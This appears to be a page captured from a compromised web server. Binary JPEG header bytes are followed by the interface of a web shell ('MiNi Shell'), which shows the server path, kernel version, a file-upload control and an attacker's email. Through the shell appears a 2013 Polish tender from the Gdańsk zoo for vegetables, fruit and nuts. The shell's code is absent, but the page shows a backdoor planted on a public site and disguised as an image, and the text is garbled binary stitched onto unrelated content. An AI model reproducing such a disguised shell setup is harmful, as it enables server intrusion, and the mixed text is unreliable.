JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130719/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130719/148427-N-2013.html

<p class="kh_header"><b>Gdańsk Oliwa: Dostawa warzyw i owoców
do Miejskiego Ogrodu Zoologicznego Wybrzeża</b><br>
<b>Numer ogłoszenia: 148427 - 2013; data zamieszczenia: 19.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ogród Zoologiczny "Wybrzeża" , ul. Karwieńska 3, 80-328 Gdańsk Oliwa, woj. pomorskie, tel. 058 5520041, fax 058 5521751.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoo.gd.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Ogrody zoologiczne i botaniczne.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa warzyw i owoców
do Miejskiego Ogrodu Zoologicznego Wybrzeża.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie I: warzywa okopowe
a)	03.22.11.12-4 - marchew w ilości 46.000kg
b)	03.21.21.00-1 - ziemniak w ilości 15.500kg
c)	03.22.11.10-0 - burak czerwony w ilości 31.000kg
d)	03.22.12.22-8 - burak pastewny w ilości 40.000kg
e)	03.22.11.10-0 - brukiew jadalna w ilości 2.200kg
f)	03.22.13.00-9 - jarmuż w ilości 2.000kg
g)	03.22.11.12-4 - marchew młoda w ilości 4.000kg
h)	03.22.14.10-3 - kapusta biała w ilości 16.000kg
i)	03.22.11.10-0 - pietruszka korzeń w ilości 3.000kg
j)	03.22.13.00-9 - por w ilości 5.000kg
k)	03.22.11.10-0 - seler w ilości 5.000kg
l)	03.22.14.20-6 - kalafior w ilości 700kg
m)	03.22.14.00-0 - kalarepa w ilości 800kg

Zadanie II: warzywa szklarniowe
a)	03.22.13.10-2 - sałata w ilości 4.000szt.
b)	03.22.14.00-0 - kapusta pekińska w ilości 3.600kg
c)	03.22.11.13-1 - szczypior gruntowy w ilości 70kg
d)	03.22.12.00-8 - arbuzy w ilości 1.800kg
e)	03.22.12.00-8 - melon żółty w ilości 1.800kg
f)	03.21.12.00-5 - kukurydza cukrowa kolby w ilości 700kg
g)	03.22.14.30-9 - brokuły w ilości 1.500kg
h)	03.22.11.10-0 - pietruszka zielona (natka) w ilości 180kg
i)	03.22.12.40-0 - pomidory w ilości 2.800kg
j)	03.22.12.30-7 - papryka czerwona w ilości 2.600kg
k)	03.22.12.70-9 - ogórki w ilości 2.600kg
l)	03.22.11.10-0 - botwina gruntowa w ilości  400kg
m)	03.22.11.14-8 - rzodkiewka bez liści w ilości 70kg
n)	03.22.11.13-1 - cebula w ilości 1.700kg
o)	03.22.12.12-5 - fasola szparagowa zielona w ilości 800kg
p)	03.22.11.14-8 - biała rzodkiew w ilości 900kg
q)	03.22.11.13-1 - czosnek w ilości 6kg
r)	03.22.13.00-9 - cykoria w ilości 800kg
s)	03.11.13.00-5 - słonecznik (tarcza) w ilości 120kg
t)	03.22.10.00-6 - seler naciowy w ilości 1.500kg
u)	03.22.12.00-8 - dynia w ilości 1.200kg
v)	03.22.12.50-3 - cukinia w ilości 1.800kg

Zadanie III: owoce krajowe
a)	03.22.23.21-9 - jabłka w ilości 17.000kg
b)	03.22.23.22-6 - gruszki w ilości 200kg
a)	03.22.23.13-0 - truskawki w ilości 200kg
b)	03.22.23.30-5 - czereśnie w ilości 50kg
c)	03.22.23.33-6 - wiśnie w ilości 100kg
d)	03.22.23.34-3 - śliwki węgierki w ilości 150kg
e)	03.22.23.00-6 - aronia w ilości 20kg
f)	03.22.23.10-9 - czarne jagody (borówka czarna)w ilości  20kg
g)	03.22.23.11-6 - czarna porzeczka w ilości  20kg
h)	03.22.23.11-6 - czerwona porzeczka w ilości 20kg

Zadanie IV: owoce cytrusowe
a)	03.22.21.11-4 - banany w ilości 8.000kg
b)	03.22.22.10-8 - cytryny w ilości 330kg
c)	03.22.21.18-3 - pomarańcze w ilości 2600kg
d)	03.22.21.18-3 - kiwi w ilości 1400kg
e)	03.22.23.30-5 - nektarynki w ilości 600kg
f)	03.22.23.40-8 - winogrona w ilości 1.500kg
g)	03.22.21.00-4 - granaty w ilości 800kg
h)	03.22.21.10-7 - papaje w ilości 50szt.
i)	03.22.21.12-1 - ananasy w ilości 100szt.
j)	03.22.21.20-0 - kokosy w ilości 50szt.

Zadanie V: orzechy
a)	03.11.12.00-4 - orzeszki ziemne w łupinie w ilości 170kg
b)	03.22.20.00-3 - orzechy laskowe w łupinie w ilości 200kg
c)	03.22.20.00-3 - orzechy włoskie krajowe w łupinie w ilości 60kg
d)	03.22.20.00-3 - orzechy laskowe łuskane w ilości 150kg
e)	03.22.20.00-3 - orzechy włoskie krajowe łuskane w ilości 60kg.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.21.21.00-1, 03.22.20.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium zostaje określone dla każdej części ( zadania) zamówienia oddzielnie. W tytule wpłaty wadium należy podać którego zadania dotyczy. Zamawiający żąda wniesienia wadium w wysokości:

a)	zadanie I -  4.300,00 zł
b)	zadanie II -  6.900,00 zł
c)	zadanie III -  900,00 zł
d)	zadanie IV -  2.800,00 zł
e)	zadanie V -  600,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy wykonali w okresie ostatnich 3 lat przed upływem terminu składania ofert, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 2 zamówienia publiczne, polegające na dostawie przedmiotu zamówienia na który Wykonawca składa ofertę, 
o wartości minimum:

Zadanie I -  100.000 PLN brutto
Zadanie  II - 200.000 PLN brutto
Zadanie III - 20.000 PLN brutto
Zadanie IV - 70.000 PLN brutto
Zadanie V - 15.000 PLN brutto</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)	Warzywa muszą być przechowywane w magazynach z możliwością regulacji temperatury.
2)	Wykonawca dysponuje, do przewozu warzyw, samochodem typu izoterma posiadającym zezwolenie na przewóz żywności.
3)	Marchew, burak czerwony, pietruszka korzeń, seler, brukiew jadalna, buraki pastewne,
muszą być płukane w płuczkarce.
4)	Wykonawca dysponuje, do przewozu owoców, samochodem typu Izoterma posiadającym zezwolenie na przewóz żywności.
5)	Kubatura magazynów musi zapewnić przechowywanie wymaganej ilości towaru do wykonania zamówienia.
6)	Wykonawca musi dysponować potencjałem technicznym niezbędnym do zapewnienia wymaganej wielkości dostaw warzyw 
( zadanie I oraz II ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1)	Umowy z producentami, bądź oświadczenia producentów o zapewnieniu wielkości dostaw dla zadań  I oraz II  - dotyczy Wykonawców nie będących producentami.
2)	Opis gospodarstwa producenta - warunków produkcji, przechowywania i transportu, posiadane certyfikaty i nagrody                  (zaleca się ich załączenie) dotyczy zadania I oraz II.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty potwierdzające posiadanie środków transportowych  zgodnie z warunkami wymienionymi w pkt. III.3.3</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoo.gd.pl/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gdańsk - Oliwa ul. Karwieńska 3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.07.2013 godzina 09:00, miejsce: Gdańsk - Oliwa ul. Karwieńska 3 pokój nr 3 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com